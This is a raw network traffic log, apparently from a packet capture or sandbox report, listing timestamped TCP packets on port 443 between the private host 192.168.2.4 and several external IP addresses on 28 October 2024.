                                                                                                                                                                            Oct 28, 2024 19:12:47.083395958 CET4435917713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:47.103235006 CET59178443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:47.103247881 CET4435917813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:47.103323936 CET59178443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:47.110331059 CET59179443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:47.110357046 CET4435917913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:47.110434055 CET59179443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:47.124862909 CET59178443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:47.124880075 CET4435917813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:47.135337114 CET59179443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:47.135412931 CET4435917913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:47.339236975 CET4435917213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:47.342324972 CET59172443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:47.342335939 CET4435917213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:47.342916012 CET59172443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:47.342921019 CET4435917213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:47.478640079 CET4435917213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:47.479127884 CET4435917213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:47.479166031 CET4435917213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:47.479177952 CET59172443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:47.479227066 CET59172443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:47.480896950 CET59172443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:47.480905056 CET4435917213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:47.480921984 CET59172443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:47.480926991 CET4435917213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:47.492435932 CET59181443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:47.492451906 CET4435918113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:47.492513895 CET59181443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:47.492777109 CET59181443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:47.492789984 CET4435918113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:47.831056118 CET4435917613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:47.831620932 CET59176443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:47.831634998 CET4435917613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:47.832247972 CET59176443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:47.832252979 CET4435917613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:47.851265907 CET4435917713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:47.851622105 CET59177443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:47.851682901 CET4435917713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:47.852262020 CET59177443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:47.852276087 CET4435917713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:47.902267933 CET4435917913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:47.902607918 CET59179443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:47.902628899 CET4435917913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:47.903119087 CET59179443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:47.903131962 CET4435917913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:47.907681942 CET4435917813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:47.908229113 CET59178443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:47.908246040 CET4435917813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:47.908765078 CET59178443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:47.908768892 CET4435917813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:47.970061064 CET4435917613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:47.970249891 CET4435917613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:47.970316887 CET59176443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:47.976345062 CET59176443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:47.976351976 CET4435917613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:47.976362944 CET59176443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:47.976366043 CET4435917613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:47.988078117 CET59183443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:47.988090992 CET4435918313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:47.988410950 CET59183443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:47.989080906 CET59183443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:47.989093065 CET4435918313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:47.989434958 CET4435917713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:47.989582062 CET4435917713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:47.989655972 CET59177443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:47.989840031 CET59177443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:47.989871025 CET4435917713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:47.989897966 CET59177443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:47.989916086 CET4435917713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:47.992917061 CET59184443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:47.992952108 CET4435918413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:47.993144035 CET59184443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:47.993921995 CET59184443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:47.993952990 CET4435918413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:48.039525986 CET4435917913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:48.039552927 CET4435917913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:48.039621115 CET59179443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:48.039642096 CET4435917913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:48.039669037 CET4435917913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:48.039719105 CET59179443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:48.040136099 CET59179443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:48.040155888 CET4435917913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.506335020 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.506380081 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.506397009 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.509793997 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.509840012 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.509849072 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.518699884 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.518752098 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.518760920 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.527970076 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.528012037 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.528022051 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.571536064 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.571544886 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.627681017 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.627729893 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.627741098 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.627902985 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.627947092 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.627954006 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.628067017 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.628114939 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.628122091 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.631700993 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.631742954 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.631752014 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.631869078 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.631908894 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.631915092 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.640415907 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.640463114 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.640472889 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.647159100 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.647202969 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.647212029 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.656718016 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.656774044 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.656783104 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.665615082 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.665659904 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.665669918 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.673336029 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.673391104 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.673401117 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.742229939 CET4435919313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.742975950 CET59193443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:49.742993116 CET4435919313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.743694067 CET59193443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:49.743700027 CET4435919313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.768984079 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.769068956 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.769174099 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.769258976 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.769344091 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.769428968 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.769516945 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.769629002 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.770611048 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.770627975 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.770637035 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.770674944 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.770874977 CET4435919413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.771230936 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.771333933 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.771356106 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.771471977 CET59194443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:49.771503925 CET4435919413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.771527052 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.771564007 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.771570921 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.771671057 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.771722078 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.771728039 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.772232056 CET4435919113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.772273064 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.772313118 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.772319078 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.772438049 CET59194443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:49.772444963 CET4435919413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.772444963 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.772479057 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.772485971 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.773159981 CET59191443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:49.773189068 CET4435919113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.773322105 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.773365974 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.773371935 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.773472071 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.773504972 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.773511887 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.774019957 CET59191443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:49.774034023 CET4435919113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.774183035 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.774229050 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.774236917 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.774333954 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.774369955 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.774375916 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.778584957 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.778631926 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.778640032 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.778737068 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.778775930 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.778780937 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.780343056 CET4435919213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.780641079 CET59192443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:49.780649900 CET4435919213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.781188011 CET59192443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:49.781193972 CET4435919213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.786981106 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.787045956 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.787055016 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.788256884 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.788299084 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.788306952 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.836371899 CET59198443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.836373091 CET59197443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.836379051 CET4435919813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.836390018 CET4435919713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.836996078 CET59197443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.837006092 CET4435919713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.838629961 CET4435920013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.839119911 CET4435919913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.841089010 CET59200443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.841105938 CET4435920013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.841411114 CET59200443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.841419935 CET4435920013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.841939926 CET59199443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.841939926 CET59199443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.841953039 CET4435919913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.841959953 CET4435919913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.971735954 CET4435919813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.971889973 CET4435919813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.972100973 CET59198443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.972100973 CET59198443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.972227097 CET59198443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.972255945 CET4435919813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.972528934 CET4435919713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.972596884 CET4435919713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.972697973 CET4435919713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.972826958 CET59197443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.972851038 CET59197443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.972851038 CET59197443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.972866058 CET4435919713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.972875118 CET4435919713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.975303888 CET59204443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.975308895 CET59203443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.975338936 CET4435920413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.975369930 CET4435920313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.975460052 CET59204443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.975462914 CET59203443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.975601912 CET59204443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.975609064 CET59203443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.975620985 CET4435920413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.975640059 CET4435920313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.979383945 CET4435920013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.980086088 CET4435920013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.980176926 CET59200443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.980176926 CET59200443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.980350018 CET59200443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.980360031 CET4435920013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.982134104 CET59205443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.982166052 CET4435920513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.982289076 CET59205443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.982353926 CET59205443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.982364893 CET4435920513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.982444048 CET4435919913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.982530117 CET4435919913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.982626915 CET59199443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.982636929 CET4435919913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.982752085 CET59199443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.982752085 CET59199443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.982882023 CET59199443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.982889891 CET4435919913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.984529972 CET59206443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.984539986 CET4435920613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.984688997 CET59206443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.984729052 CET59206443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.984734058 CET4435920613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:51.106452942 CET4435920213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:51.107264042 CET59202443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:51.107264996 CET59202443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:51.107289076 CET4435920213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:51.107300043 CET4435920213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:51.249658108 CET4435920213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:51.249730110 CET4435920213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:51.249842882 CET4435920213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:51.250005007 CET59202443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:51.250035048 CET59202443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:51.250035048 CET59202443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:51.250051022 CET4435920213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:51.250058889 CET4435920213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:51.252748966 CET59207443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:51.252768993 CET4435920713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:51.252933979 CET59207443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:51.253047943 CET59207443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:51.253060102 CET4435920713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:51.775495052 CET4435920413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:51.777677059 CET4435920313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:51.779980898 CET4435920613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:51.780951977 CET4435920513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:51.792494059 CET59208443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:51.792582989 CET44359208162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:51.793047905 CET59208443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:51.796277046 CET59209443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:51.796304941 CET44359209162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:51.796356916 CET59209443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:51.804182053 CET59208443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:51.804222107 CET44359208162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:51.808011055 CET59209443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:51.808027029 CET44359209162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:51.812251091 CET59210443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:51.812263012 CET44359210162.159.61.3192.168.2.4
